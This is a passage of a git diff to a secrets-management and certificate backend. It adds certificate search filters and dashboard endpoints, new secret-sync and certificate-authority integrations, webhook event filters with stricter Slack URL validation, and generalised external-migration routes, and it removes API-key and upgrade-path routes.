extendedKeyUsage: z.string().trim().optional().describe(PROJECTS.SEARCH_CERTIFICATES.extendedKeyUsage) + extendedKeyUsage: z.string().trim().optional().describe(PROJECTS.SEARCH_CERTIFICATES.extendedKeyUsage), + keyAlgorithm: z + .union([z.string().trim(), z.array(z.string().trim())]) + .optional() + .describe(PROJECTS.SEARCH_CERTIFICATES.keyAlgorithm), + signatureAlgorithm: z.string().trim().optional().describe(PROJECTS.SEARCH_CERTIFICATES.signatureAlgorithm), + keySizes: z.array(z.number()).optional().describe(PROJECTS.SEARCH_CERTIFICATES.keySizes), + caIds: z.array(z.string().uuid()).optional().describe(PROJECTS.SEARCH_CERTIFICATES.caIds), + enrollmentTypes: z.array(z.string().trim()).optional().describe(PROJECTS.SEARCH_CERTIFICATES.enrollmentTypes), + source: z + .union([z.string().trim(), z.array(z.string().trim())]) + .optional() + .describe(PROJECTS.SEARCH_CERTIFICATES.source), + notAfterFrom: z.coerce.date().optional().describe(PROJECTS.SEARCH_CERTIFICATES.notAfterFrom), + notAfterTo: z.coerce.date().optional().describe(PROJECTS.SEARCH_CERTIFICATES.notAfterTo), + notBeforeFrom: z.coerce.date().optional().describe(PROJECTS.SEARCH_CERTIFICATES.notBeforeFrom), + notBeforeTo: z.coerce.date().optional().describe(PROJECTS.SEARCH_CERTIFICATES.notBeforeTo), + sortBy: z + .enum(["notAfter", "notBefore", "createdAt", "commonName", "keyAlgorithm", "status"]) + .optional() + .describe(PROJECTS.SEARCH_CERTIFICATES.sortBy), + sortOrder: z.enum(["asc", "desc"]).optional().describe(PROJECTS.SEARCH_CERTIFICATES.sortOrder) }), response: { 200: z.object({ - certificates: z.array(CertificatesSchema.extend({ hasPrivateKey: z.boolean() })), + certificates: z.array( + CertificatesSchema.extend({ + hasPrivateKey: z.boolean(), + caName: z.string().nullable().optional(), + profileName: z.string().nullable().optional(), + enrollmentType: z.string().nullable().optional() + }) + ), totalCount: z.number() }) } }, onRequest: verifyAuth([AuthMode.JWT, AuthMode.IDENTITY_ACCESS_TOKEN]), handler: async (req) => { - const { metadata, ...filters } = req.body; + const { metadata, sortBy, sortOrder, ...filters } = req.body; const { certificates, totalCount } = await server.services.project.listProjectCertificates({ filter: { projectId: req.params.projectId, @@ -1328,12 +1356,157 @@ export const registerProjectRouter = async (server: FastifyZodProvider) => { actorAuthMethod: req.permission.authMethod, actor: req.permission.type, ...filters, - metadataFilter: metadata + metadataFilter: metadata, + sortBy, + sortOrder }); return { certificates, totalCount }; } }); + server.route({ + method: "GET", + url: "/:projectId/certificates/dashboard-stats", + config: { + rateLimit: readLimit + }, + schema: { + hide: true, + operationId: "getCertificateDashboardStats", + tags: [ApiDocsTags.PkiCertificates], + description: "Get aggregated dashboard statistics for certificates in a project.", + params: z.object({ + projectId: z.string().trim() + }), + response: { + 200: z.object({ + totals: z.object({ + total: z.number(), + active: z.number(), + expiringSoon: z.number(), + expired: z.number(), + revoked: z.number() + }), + expiringSoonNoAutoRenewal: z.number(), + expiredNotRenewed: z.number(), + distributions: z.object({ + byEnrollmentMethod: z.array(z.object({ label: z.string(), count: z.number() })), + byAlgorithm: z.array(z.object({ label: z.string(), count: z.number() })), + byCA: z.array(z.object({ id: z.string(), label: z.string(), count: z.number() })), + byStatus: z.array(z.object({ label: z.string(), count: z.number() })) + }), + expirationBuckets: z.array(z.object({ bucket: z.string(), count: z.number() })), + validityBuckets: z.array(z.object({ bucket: z.string(), count: z.number() })) + }) + } + }, + onRequest: verifyAuth([AuthMode.JWT, AuthMode.IDENTITY_ACCESS_TOKEN]), + handler: async (req) => { + return server.services.project.getDashboardStats({ + filter: { + projectId: req.params.projectId, + type: ProjectFilterType.ID + }, + actorId: req.permission.id, + actorOrgId: req.permission.orgId, + actorAuthMethod: req.permission.authMethod, + actor: req.permission.type + }); + } + }); + + server.route({ + method: "GET", + url: "/:projectId/certificates/activity-trend", + config: { + rateLimit: readLimit + }, + schema: { + hide: true, + operationId: "getCertificateActivityTrend", + tags: [ApiDocsTags.PkiCertificates], + description: "Get certificate lifecycle activity trend over time.", + params: z.object({ + projectId: z.string().trim() + }), + querystring: z.object({ + range: z.enum(["7d", "30d", "6m"]).optional().default("30d") + }), + response: { + 200: z.object({ + periods: z.array( + z.object({ + period: z.string(), + issued: z.number(), + expired: z.number(), + revoked: z.number(), + renewed: z.number() + }) + ) + }) + } + }, + onRequest: verifyAuth([AuthMode.JWT, AuthMode.IDENTITY_ACCESS_TOKEN]), + handler: async (req) => { + return server.services.project.getActivityTrend({ + filter: { + projectId: req.params.projectId, + type: ProjectFilterType.ID + }, + range: req.query.range, + actorId: req.permission.id, + actorOrgId: req.permission.orgId, + actorAuthMethod: req.permission.authMethod, + actor: req.permission.type + }); + } + }); + + server.route({ + method: "GET", + url: "/:projectId/certificates/pqc-trend", + config: { + rateLimit: readLimit + }, + schema: { + hide: true, + operationId: "getCertificatePqcTrend", + tags: [ApiDocsTags.PkiCertificates], + description: "Get certificate PQC adoption trend over time.", + params: z.object({ + projectId: z.string().trim() + }), + querystring: z.object({ + range: z.enum(["7d", "30d", "6m"]).optional().default("30d") + }), + response: { + 200: z.object({ + periods: z.array( + z.object({ + period: z.string(), + pqc: z.number(), + nonPqc: z.number() + }) + ) + }) + } + }, + onRequest: verifyAuth([AuthMode.JWT, AuthMode.IDENTITY_ACCESS_TOKEN]), + handler: async (req) => { + return server.services.project.getPqcTrend({ + filter: { + projectId: req.params.projectId, + type: ProjectFilterType.ID + }, + range: req.query.range, + actorId: req.permission.id, + actorOrgId: req.permission.orgId, + actorAuthMethod: req.permission.authMethod, + actor: req.permission.type + }); + } + }); + server.route({ method: "GET", url: "/:projectId/pki-alerts", diff --git a/backend/src/server/routes/v1/secret-sync-routers/index.ts b/backend/src/server/routes/v1/secret-sync-routers/index.ts index abe6d17f251..b2b04436a4d 100644 --- a/backend/src/server/routes/v1/secret-sync-routers/index.ts +++ b/backend/src/server/routes/v1/secret-sync-routers/index.ts @@ -29,11 +29,13 @@ import { registerLaravelForgeSyncRouter } from "./laravel-forge-sync-router"; import { registerNetlifySyncRouter } from "./netlify-sync-router"; import { registerNorthflankSyncRouter } from "./northflank-sync-router"; import { registerOctopusDeploySyncRouter } from "./octopus-deploy-sync-router"; +import { registerOnaSyncRouter } from "./ona-sync-router"; import { registerRailwaySyncRouter } from "./railway-sync-router"; import { registerRenderSyncRouter } from "./render-sync-router"; import { registerSupabaseSyncRouter } from "./supabase-sync-router"; import { registerTeamCitySyncRouter } from "./teamcity-sync-router"; import { registerTerraformCloudSyncRouter } from "./terraform-cloud-sync-router"; +import { registerTravisCISyncRouter } from "./travis-ci-sync-router"; import { registerVercelSyncRouter } from "./vercel-sync-router"; import { registerWindmillSyncRouter } from "./windmill-sync-router"; import { registerZabbixSyncRouter } from "./zabbix-sync-router"; @@ -77,5 +79,7 @@ export const SECRET_SYNC_REGISTER_ROUTER_MAP: Record + registerSyncSecretsEndpoints({ + destination: SecretSync.Ona, + server, + responseSchema: OnaSyncSchema, + createSchema: CreateOnaSyncSchema, + updateSchema: UpdateOnaSyncSchema + }); diff --git a/backend/src/server/routes/v1/secret-sync-routers/secret-sync-endpoints.ts b/backend/src/server/routes/v1/secret-sync-routers/secret-sync-endpoints.ts index 9ef59182adb..801bb7068ab 100644 --- a/backend/src/server/routes/v1/secret-sync-routers/secret-sync-endpoints.ts +++ b/backend/src/server/routes/v1/secret-sync-routers/secret-sync-endpoints.ts @@ -48,7 +48,8 @@ export const registerSyncSecretsEndpoints = = { [SecretSync.OnePass]: "OnePassword", [SecretSync.GitHub]: "GitHub", - [SecretSync.GitLab]: "GitLab" + [SecretSync.GitLab]: "GitLab", + [SecretSync.TravisCI]: "TravisCI" }; const destinationNameForOpId = specialCases[destination] ?? diff --git a/backend/src/server/routes/v1/secret-sync-routers/secret-sync-router.ts b/backend/src/server/routes/v1/secret-sync-routers/secret-sync-router.ts index 5b10c51756f..5981d633a7e 100644 --- a/backend/src/server/routes/v1/secret-sync-routers/secret-sync-router.ts +++ b/backend/src/server/routes/v1/secret-sync-routers/secret-sync-router.ts @@ -58,11 +58,13 @@ import { LaravelForgeSyncListItemSchema, LaravelForgeSyncSchema } from "@app/ser import { NetlifySyncListItemSchema, NetlifySyncSchema } from "@app/services/secret-sync/netlify"; import { NorthflankSyncListItemSchema, NorthflankSyncSchema } from "@app/services/secret-sync/northflank"; import { OctopusDeploySyncListItemSchema, OctopusDeploySyncSchema } from "@app/services/secret-sync/octopus-deploy"; +import { OnaSyncListItemSchema, OnaSyncSchema } from "@app/services/secret-sync/ona"; import { RailwaySyncListItemSchema, RailwaySyncSchema } from "@app/services/secret-sync/railway/railway-sync-schemas"; import { RenderSyncListItemSchema, RenderSyncSchema } from "@app/services/secret-sync/render/render-sync-schemas"; import { SupabaseSyncListItemSchema, SupabaseSyncSchema } from "@app/services/secret-sync/supabase"; import { TeamCitySyncListItemSchema, TeamCitySyncSchema } from "@app/services/secret-sync/teamcity"; import { TerraformCloudSyncListItemSchema, TerraformCloudSyncSchema } from "@app/services/secret-sync/terraform-cloud"; +import { TravisCISyncListItemSchema, TravisCISyncSchema } from "@app/services/secret-sync/travis-ci"; import { VercelSyncListItemSchema, VercelSyncSchema } from "@app/services/secret-sync/vercel"; import { WindmillSyncListItemSchema, WindmillSyncSchema } from "@app/services/secret-sync/windmill"; import { ZabbixSyncListItemSchema, ZabbixSyncSchema } from "@app/services/secret-sync/zabbix"; @@ -104,7 +106,9 @@ const SecretSyncSchema = z.discriminatedUnion("destination", [ OctopusDeploySyncSchema, CircleCISyncSchema, AzureEntraIdScimSyncSchema, - ExternalInfisicalSyncSchema + ExternalInfisicalSyncSchema, + OnaSyncSchema, + TravisCISyncSchema ]); const SecretSyncOptionsSchema = z.discriminatedUnion("destination", [ @@ -144,7 +148,9 @@ const SecretSyncOptionsSchema = z.discriminatedUnion("destination", [ OctopusDeploySyncListItemSchema, CircleCISyncListItemSchema, AzureEntraIdScimSyncListItemSchema, - ExternalInfisicalSyncListItemSchema + ExternalInfisicalSyncListItemSchema, + OnaSyncListItemSchema, + TravisCISyncListItemSchema ]); export const registerSecretSyncRouter = async (server: FastifyZodProvider) => { diff --git a/backend/src/server/routes/v1/secret-sync-routers/travis-ci-sync-router.ts b/backend/src/server/routes/v1/secret-sync-routers/travis-ci-sync-router.ts new file mode 100644 index 00000000000..cf4cc88158d --- /dev/null +++ b/backend/src/server/routes/v1/secret-sync-routers/travis-ci-sync-router.ts @@ -0,0 +1,17 @@ +import { SecretSync } from "@app/services/secret-sync/secret-sync-enums"; +import { + CreateTravisCISyncSchema, + TravisCISyncSchema, + UpdateTravisCISyncSchema +} from "@app/services/secret-sync/travis-ci"; + +import { registerSyncSecretsEndpoints } from "./secret-sync-endpoints"; + +export const registerTravisCISyncRouter = async (server: FastifyZodProvider) => + registerSyncSecretsEndpoints({ + destination: SecretSync.TravisCI, + server, + responseSchema: TravisCISyncSchema, + createSchema: CreateTravisCISyncSchema, + updateSchema: UpdateTravisCISyncSchema + }); diff --git a/backend/src/server/routes/v1/upgrade-path-router.ts b/backend/src/server/routes/v1/upgrade-path-router.ts deleted file mode 100644 index 752118c7353..00000000000 --- a/backend/src/server/routes/v1/upgrade-path-router.ts +++ /dev/null @@ -1,119 +0,0 @@ -import { z } from "zod"; - -import { BadRequestError } from "@app/lib/errors"; -import { logger } from "@app/lib/logger"; -import { publicEndpointLimit } from "@app/server/config/rateLimiter"; -import { versionSchema } from "@app/services/upgrade-path/upgrade-path-schemas"; - -export const registerUpgradePathRouter = async (server: FastifyZodProvider) => { - server.route({ - method: "GET", - url: "/versions", - config: { - rateLimit: publicEndpointLimit - }, - schema: { - operationId: "listUpgradeVersions", - response: { - 200: z.object({ - versions: z.array( - z.object({ - tagName: z.string(), - name: z.string(), - publishedAt: z.string(), - prerelease: z.boolean(), - draft: z.boolean() - }) - ) - }) - } - }, - handler: async (req) => { - try { - const versions = await req.server.services.upgradePath.getGitHubReleases(); - - return { - versions - }; - } catch (error) { - logger.error(error, "Failed to fetch versions"); - if (error instanceof z.ZodError) { - throw new BadRequestError({ message: "Invalid query parameters" }); - } - throw new BadRequestError({ message: "Failed to fetch GitHub releases" }); - } - } - }); - - server.route({ - method: "POST", - url: "/calculate", - config: { - rateLimit: publicEndpointLimit - }, - schema: { - operationId: "calculateUpgradePath", - body: z.object({ - fromVersion: versionSchema, - toVersion: versionSchema - }), - response: { - 200: z.object({ - path: z.array( - z.object({ - version: z.string(), - name: z.string(), - publishedAt: z.string(), - prerelease: z.boolean() - }) - ), - breakingChanges: z.array( - z.object({ - version: z.string(), - changes: z.array( - z.object({ - title: z.string(), - description: z.string(), - action: z.string() - }) - ) - }) - ), - features: z.array( - z.object({ - version: z.string(), - name: z.string(), - body: z.string(), - publishedAt: z.string() - }) - ), - hasDbMigration: z.boolean(), - config: z.record(z.unknown()) - }) - } - }, - handler: async (req) => { - try { - const { fromVersion, toVersion } = req.body; - - const result = await req.server.services.upgradePath.calculateUpgradePath(fromVersion, toVersion); - - logger.info( - { pathLength: result.path.length, hasBreaking: result.breakingChanges.length > 0 }, - "Upgrade path calculated" - ); - - return result; - } catch (error) { - logger.error(error, "Failed to calculate upgrade path"); - if (error instanceof z.ZodError) { - throw new BadRequestError({ message: `Invalid input: ${error.errors.map((e) => e.message).join(", ")}` }); - } - if (error instanceof Error) { - throw new BadRequestError({ message: error.message }); - } - throw new BadRequestError({ message: "Failed to calculate upgrade path" }); - } - } - }); -}; diff --git a/backend/src/server/routes/v1/webhook-router.ts b/backend/src/server/routes/v1/webhook-router.ts index f3b8804f1af..a4e80196a04 100644 --- a/backend/src/server/routes/v1/webhook-router.ts +++ b/backend/src/server/routes/v1/webhook-router.ts @@ -8,7 +8,11 @@ import { getTelemetryDistinctId } from "@app/server/lib/telemetry"; import { verifyAuth } from "@app/server/plugins/auth/verify-auth"; import { AuthMode } from "@app/services/auth/auth-type"; import { PostHogEventTypes } from "@app/services/telemetry/telemetry-types"; -import { WebhookType } from "@app/services/webhook/webhook-types"; +import { + SUBSCRIBABLE_WEBHOOK_EVENTS, + TSubscribableWebhookEvent, + WebhookType +} from "@app/services/webhook/webhook-types"; export const sanitizedWebhookSchema = WebhooksSchema.pick({ id: true, @@ -26,7 +30,12 @@ export const sanitizedWebhookSchema = WebhooksSchema.pick({ id: z.string(), name: z.string(), slug: z.string() - }) + }), + eventsFilter: z.array( + z.object({ + eventName: z.enum([...SUBSCRIBABLE_WEBHOOK_EVENTS] as [TSubscribableWebhookEvent, ...TSubscribableWebhookEvent[]]) + }) + ) }); export const registerWebhookRouter = async (server: FastifyZodProvider) => { @@ -46,15 +55,28 @@ export const registerWebhookRouter = async (server: FastifyZodProvider) => { environment: z.string().trim(), webhookUrl: z.string().url().trim(), webhookSecretKey: z.string().trim().optional(), - secretPath: z.string().trim().default("/").transform(removeTrailingSlash) + secretPath: z.string().trim().default("/").transform(removeTrailingSlash), + eventsFilter: z + .array( + z.object({ + eventName: z.enum([...SUBSCRIBABLE_WEBHOOK_EVENTS] as [ + TSubscribableWebhookEvent, + ...TSubscribableWebhookEvent[] + ]) + }) + ) + .optional() }) .superRefine((data, ctx) => { - if (data.type === WebhookType.SLACK && !data.webhookUrl.includes("hooks.slack.com")) { - ctx.addIssue({ - code: z.ZodIssueCode.custom, - message: "Incoming Webhook URL is invalid.", - path: ["webhookUrl"] - }); + if (data.type === WebhookType.SLACK) { + const parsed = new URL(data.webhookUrl); + if (parsed.hostname !== "hooks.slack.com") { + ctx.addIssue({ + code: z.ZodIssueCode.custom, + message: "Incoming Webhook URL is invalid.", + path: ["webhookUrl"] + }); + } } }), response: { @@ -82,7 +104,8 @@ export const registerWebhookRouter = async (server: FastifyZodProvider) => { environment: webhook.environment.slug, webhookId: webhook.id, isDisabled: webhook.isDisabled, - secretPath: webhook.secretPath + secretPath: webhook.secretPath, + eventsFilter: webhook.eventsFilter } } }); @@ -115,9 +138,23 @@ export const registerWebhookRouter = async (server: FastifyZodProvider) => { params: z.object({ webhookId: z.string().trim() }), - body: z.object({ - isDisabled: z.boolean().default(false) - }), + body: z + .object({ + isDisabled: z.boolean().optional(), + eventsFilter: z + .array( + z.object({ + eventName: z.enum([...SUBSCRIBABLE_WEBHOOK_EVENTS] as [ + TSubscribableWebhookEvent, + ...TSubscribableWebhookEvent[] + ]) + }) + ) + .optional() + }) + .refine(({ isDisabled, eventsFilter }) => { + return isDisabled !== undefined || eventsFilter !== undefined; + }, "At least one field is required"), response: { 200: z.object({ message: z.string(), @@ -132,7 +169,8 @@ export const registerWebhookRouter = async (server: FastifyZodProvider) => { actorAuthMethod: req.permission.authMethod, actorOrgId: req.permission.orgId, id: req.params.webhookId, - isDisabled: req.body.isDisabled + isDisabled: req.body.isDisabled, + eventsFilter: req.body.eventsFilter }); await server.services.auditLog.createAuditLog({ @@ -144,7 +182,8 @@ export const registerWebhookRouter = async (server: FastifyZodProvider) => { environment: webhook.environment.slug, webhookId: webhook.id, isDisabled: webhook.isDisabled, - secretPath: webhook.secretPath + secretPath: webhook.secretPath, + eventsFilter: webhook.eventsFilter } } }); diff --git a/backend/src/server/routes/v2/certificate-authority-router.ts b/backend/src/server/routes/v2/certificate-authority-router.ts index e5c9d5fd643..51fe7a20955 100644 --- a/backend/src/server/routes/v2/certificate-authority-router.ts +++ b/backend/src/server/routes/v2/certificate-authority-router.ts @@ -6,16 +6,22 @@ import { readLimit } from "@app/server/config/rateLimiter"; import { verifyAuth } from "@app/server/plugins/auth/verify-auth"; import { AuthMode } from "@app/services/auth/auth-type"; import { AcmeCertificateAuthoritySchema } from "@app/services/certificate-authority/acme/acme-certificate-authority-schemas"; +import { AwsAcmPublicCaCertificateAuthoritySchema } from "@app/services/certificate-authority/aws-acm-public-ca/aws-acm-public-ca-certificate-authority-schemas"; import { AwsPcaCertificateAuthoritySchema } from "@app/services/certificate-authority/aws-pca/aws-pca-certificate-authority-schemas"; import { AzureAdCsCertificateAuthoritySchema } from "@app/services/certificate-authority/azure-ad-cs/azure-ad-cs-certificate-authority-schemas"; import { CaType } from "@app/services/certificate-authority/certificate-authority-enums"; +import { DigiCertCertificateAuthoritySchema } from "@app/services/certificate-authority/digicert/digicert-certificate-authority-schemas"; import { InternalCertificateAuthoritySchema } from "@app/services/certificate-authority/internal/internal-certificate-authority-schemas"; +import { VenafiTppCertificateAuthoritySchema } from "@app/services/certificate-authority/venafi-tpp/venafi-tpp-certificate-authority-schemas"; const CertificateAuthoritySchema = z.discriminatedUnion("type", [ InternalCertificateAuthoritySchema, AcmeCertificateAuthoritySchema, AzureAdCsCertificateAuthoritySchema, - AwsPcaCertificateAuthoritySchema + AwsPcaCertificateAuthoritySchema, + DigiCertCertificateAuthoritySchema, + AwsAcmPublicCaCertificateAuthoritySchema, + VenafiTppCertificateAuthoritySchema ]); export const registerCaRouter = async (server: FastifyZodProvider) => { @@ -73,6 +79,30 @@ export const registerCaRouter = async (server: FastifyZodProvider) => { req.permission ); + const digicertCas = await server.services.certificateAuthority.listCertificateAuthoritiesByProjectId( + { + projectId: req.query.projectId, + type: CaType.DIGICERT + }, + req.permission + ); + + const awsAcmPublicCas = await server.services.certificateAuthority.listCertificateAuthoritiesByProjectId( + { + projectId: req.query.projectId, + type: CaType.AWS_ACM_PUBLIC_CA + }, + req.permission + ); + + const venafiTppCas = await server.services.certificateAuthority.listCertificateAuthoritiesByProjectId( + { + projectId: req.query.projectId, + type: CaType.VENAFI_TPP + }, + req.permission + ); + await server.services.auditLog.createAuditLog({ ...req.auditLogInfo, projectId: req.query.projectId, @@ -83,7 +113,10 @@ export const registerCaRouter = async (server: FastifyZodProvider) => { ...(internalCas ?? []).map((ca) => ca.id), ...(acmeCas ?? []).map((ca) => ca.id), ...(azureAdCsCas ?? []).map((ca) => ca.id), - ...(awsPcaCas ?? []).map((ca) => ca.id) + ...(awsPcaCas ?? []).map((ca) => ca.id), + ...(digicertCas ?? []).map((ca) => ca.id), + ...(awsAcmPublicCas ?? []).map((ca) => ca.id), + ...(venafiTppCas ?? []).map((ca) => ca.id) ] } } @@ -94,7 +127,10 @@ export const registerCaRouter = async (server: FastifyZodProvider) => { ...(internalCas ?? []), ...(acmeCas ?? []), ...(azureAdCsCas ?? []), - ...(awsPcaCas ?? []) + ...(awsPcaCas ?? []), + ...(digicertCas ?? []), + ...(awsAcmPublicCas ?? []), + ...(venafiTppCas ?? []) ] }; } diff --git a/backend/src/server/routes/v2/mfa-router.ts b/backend/src/server/routes/v2/mfa-router.ts index e85d09ffdfa..f8c6e5e2258 100644 --- a/backend/src/server/routes/v2/mfa-router.ts +++ b/backend/src/server/routes/v2/mfa-router.ts @@ -10,7 +10,7 @@ import { addAuthOriginDomainCookie } from "@app/server/lib/cookie"; import { AuthModeMfaJwtTokenPayload, AuthTokenType, MfaMethod } from "@app/services/auth/auth-type"; const handleMfaVerification = async ( - req: FastifyRequest & { mfa: { userId: string; orgId?: string; user: TUsers } }, + req: FastifyRequest & { mfa: { userId: string; orgId?: string; user: TUsers; requiredMfaMethod: MfaMethod } }, res: FastifyReply, server: FastifyZodProvider, mfaToken: string, @@ -31,6 +31,7 @@ const handleMfaVerification = async ( orgId: req.mfa.orgId, mfaToken, mfaMethod, + requiredMfaMethod: req.mfa.requiredMfaMethod, isRecoveryCode }); @@ -72,7 +73,12 @@ export const registerMfaRouter = async (server: FastifyZodProvider) => { const user = await server.store.user.findById(decodedToken.userId); if (!user) throw new Error("User not found"); - req.mfa = { userId: user.id, user, orgId: decodedToken.organizationId }; + req.mfa = { + userId: user.id, + user, + orgId: decodedToken.organizationId, + requiredMfaMethod: decodedToken.requiredMfaMethod + }; }); server.route({ @@ -90,7 +96,7 @@ export const registerMfaRouter = async (server: FastifyZodProvider) => { } }, handler: async (req) => { - await server.services.login.resendMfaToken(req.mfa.userId); + await server.services.login.resendMfaToken(req.mfa.userId, req.mfa.requiredMfaMethod); return { message: "Successfully send new mfa code" }; } }); diff --git a/backend/src/server/routes/v2/user-router.ts b/backend/src/server/routes/v2/user-router.ts index ac539549973..62810e5f304 100644 --- a/backend/src/server/routes/v2/user-router.ts +++ b/backend/src/server/routes/v2/user-router.ts @@ -1,7 +1,6 @@ import { z } from "zod"; import { AuthTokenSessionsSchema } from "@app/db/schemas"; -import { ApiKeysSchema } from "@app/db/schemas/api-keys"; import { readLimit, smtpRateLimit, writeLimit } from "@app/server/config/rateLimiter"; import { verifyAuth } from "@app/server/plugins/auth/verify-auth"; import { AuthMethod, AuthMode, MfaMethod } from "@app/services/auth/auth-type"; @@ -193,75 +192,6 @@ export const registerUserRouter = async (server: FastifyZodProvider) => { } }); - server.route({ - method: "GET", - url: "/me/api-keys", - config: { - rateLimit: readLimit - }, - schema: { - operationId: "listUserApiKeys", - response: { - 200: ApiKeysSchema.omit({ secretHash: true }).array() - } - }, - onRequest: verifyAuth([AuthMode.JWT]), - handler: async (req) => { - const apiKeys = await server.services.apiKey.getMyApiKeys(req.permission.id); - return apiKeys; - } - }); - - server.route({ - method: "POST", - url: "/me/api-keys", - config: { - rateLimit: writeLimit - }, - schema: { - operationId: "createUserApiKey", - body: z.object({ - name: z.string().trim(), - expiresIn: z.number() - }), - response: { - 200: z.object({ - apiKey: z.string(), - apiKeyData: ApiKeysSchema.omit({ secretHash: true }) - }) - } - }, - onRequest: verifyAuth([AuthMode.JWT]), - handler: async (req) => { - const apiKeys = await server.services.apiKey.createApiKey(req.permission.id, req.body.name, req.body.expiresIn); - return apiKeys; - } - }); - - server.route({ - method: "DELETE", - url: "/me/api-keys/:apiKeyDataId", - config: { - rateLimit: writeLimit - }, - schema: { - operationId: "deleteUserApiKey", - params: z.object({ - apiKeyDataId: z.string().trim() - }), - response: { - 200: z.object({ - apiKeyData: ApiKeysSchema.omit({ secretHash: true }) - }) - } - }, - onRequest: verifyAuth([AuthMode.JWT]), - handler: async (req) => { - const apiKeyData = await server.services.apiKey.deleteApiKey(req.permission.id, req.params.apiKeyDataId); - return { apiKeyData }; - } - }); - server.route({ method: "GET", url: "/me/sessions", diff --git a/backend/src/server/routes/v3/external-migration-router.ts b/backend/src/server/routes/v3/external-migration-router.ts index c44ecb4b181..59592bcfadf 100644 --- a/backend/src/server/routes/v3/external-migration-router.ts +++ b/backend/src/server/routes/v3/external-migration-router.ts @@ -1,13 +1,17 @@ import fastifyMultipart from "@fastify/multipart"; import { z } from "zod"; +import { EventType } from "@app/ee/services/audit-log/audit-log-types"; import { BadRequestError } from "@app/lib/errors"; import { readLimit, writeLimit } from "@app/server/config/rateLimiter"; import { verifyAuth } from "@app/server/plugins/auth/verify-auth"; import { AuthMode } from "@app/services/auth/auth-type"; import { - ExternalMigrationProviders, - VaultImportStatus, + ExternalMigrationConfigSchema, + ExternalMigrationProviders +} from "@app/services/external-migration/external-migration-schemas"; +import { + ExternalMigrationImportStatus, VaultMappingType } from "@app/services/external-migration/external-migration-types"; @@ -122,19 +126,22 @@ export const registerExternalMigrationRouter = async (server: FastifyZodProvider server.route({ method: "GET", - url: "/vault/configs", + url: "/:provider/configs", config: { rateLimit: readLimit }, schema: { - operationId: "getVaultExternalMigrationConfigsV3", + operationId: "getExternalMigrationConfigsV3", + params: z.object({ + provider: z.nativeEnum(ExternalMigrationProviders) + }), response: { 200: z.object({ configs: z .object({ id: z.string(), orgId: z.string(), - namespace: z.string(), + provider: z.string(), connectionId: z.string().nullish(), createdAt: z.date(), updatedAt: z.date() @@ -145,8 +152,9 @@ export const registerExternalMigrationRouter = async (server: FastifyZodProvider }, onRequest: verifyAuth([AuthMode.JWT]), handler: async (req) => { - const configs = await server.services.migration.getVaultExternalMigrationConfigs({ - actor: req.permission + const configs = await server.services.migration.getExternalMigrationConfigs({ + actor: req.permission, + provider: req.params.provider }); return { configs }; @@ -155,23 +163,26 @@ export const registerExternalMigrationRouter = async (server: FastifyZodProvider server.route({ method: "POST", - url: "/vault/configs", + url: "/:provider/configs", config: { rateLimit: writeLimit }, schema: { - operationId: "createVaultExternalMigrationV3", + operationId: "createExternalMigrationV3", + params: z.object({ + provider: z.nativeEnum(ExternalMigrationProviders) + }), body: z.object({ connectionId: z.string(), - namespace: z.string() + input: ExternalMigrationConfigSchema }), response: { 200: z.object({ config: z.object({ id: z.string(), orgId: z.string(), - namespace: z.string(), - connectionId: z.string().nullable().optional(), + provider: z.string(), + connectionId: z.string().nullish(), createdAt: z.date(), updatedAt: z.date() }) @@ -180,37 +191,52 @@ export const registerExternalMigrationRouter = async (server: FastifyZodProvider }, onRequest: verifyAuth([AuthMode.JWT]), handler: async (req) => { - const config = await server.services.migration.createVaultExternalMigration({ - ...req.body, + const config = await server.services.migration.createExternalMigration({ + config: req.body.input, + connectionId: req.body.connectionId, actor: req.permission }); + await server.services.auditLog.createAuditLog({ + orgId: req.permission.orgId, + ...req.auditLogInfo, + event: { + type: EventType.EXTERNAL_MIGRATION_CREATE, + metadata: { + configId: config.id, + provider: req.params.provider, + connectionId: req.body.connectionId + } + } + }); + return { config }; } }); server.route({ method: "PUT", - url: "/vault/configs/:id", + url: "/:provider/configs/:id", config: { rateLimit: writeLimit }, schema: { - operationId: "updateVaultExternalMigrationV3", + operationId: "updateExternalMigrationV3", params: z.object({ + provider: z.nativeEnum(ExternalMigrationProviders), id: z.string() }), body: z.object({ - connectionId: z.string(), - namespace: z.string() + connectionId: z.string().nullable(), + input: ExternalMigrationConfigSchema }), response: { 200: z.object({ config: z.object({ id: z.string(), orgId: z.string(), - namespace: z.string(), - connectionId: z.string().nullable().optional(), + provider: z.string(), + connectionId: z.string().nullish(), createdAt: z.date(), updatedAt: z.date() }) @@ -219,25 +245,40 @@ export const registerExternalMigrationRouter = async (server: FastifyZodProvider }, onRequest: verifyAuth([AuthMode.JWT]), handler: async (req) => { - const config = await server.services.migration.updateVaultExternalMigration({ + const config = await server.services.migration.updateExternalMigration({ id: req.params.id, - ...req.body, + config: req.body.input, + connectionId: req.body.connectionId, actor: req.permission }); + await server.services.auditLog.createAuditLog({ + orgId: req.permission.orgId, + ...req.auditLogInfo, + event: { + type: EventType.EXTERNAL_MIGRATION_UPDATE, + metadata: { + configId: req.params.id, + provider: req.params.provider, + connectionId: req.body.connectionId + } + } + }); + return { config }; } }); server.route({ method: "DELETE", - url: "/vault/configs/:id", + url: "/:provider/configs/:id", config: { rateLimit: writeLimit }, schema: { - operationId: "deleteVaultExternalMigrationV3", + operationId: "deleteExternalMigrationV3", params: z.object({ + provider: z.nativeEnum(ExternalMigrationProviders), id: z.string() }), response: { @@ -245,8 +286,8 @@ export const registerExternalMigrationRouter = async (server: FastifyZodProvider config: z.object({ id: z.string(), orgId: z.string(), - namespace: z.string(), - connectionId: z.string().nullable().optional(), + provider: z.string(), + connectionId: z.string().nullish(), createdAt: z.date(), updatedAt: z.date() }) @@ -255,11 +296,23 @@ export const registerExternalMigrationRouter = async (server: FastifyZodProvider }, onRequest: verifyAuth([AuthMode.JWT]), handler: async (req) => { - const config = await server.services.migration.deleteVaultExternalMigration({ + const config = await server.services.migration.deleteExternalMigration({ id: req.params.id, actor: req.permission }); + await server.services.auditLog.createAuditLog({ + orgId: req.permission.orgId, + ...req.auditLogInfo, + event: { + type: EventType.EXTERNAL_MIGRATION_DELETE, + metadata: { + configId: req.params.id, + provider: req.params.provider + } + } + }); + return { config }; } }); @@ -274,7 +327,7 @@ export const registerExternalMigrationRouter = async (server: FastifyZodProvider operationId: "getVaultNamespacesV3", response: { 200: z.object({ - namespaces: z.array(z.object({ id: z.string(), name: z.string() })) + namespaces: z.array(z.object({ id: z.string().nullish(), name: z.string().nullish() })) }) } }, @@ -387,11 +440,11 @@ export const registerExternalMigrationRouter = async (server: FastifyZodProvider environment: z.string(), secretPath: 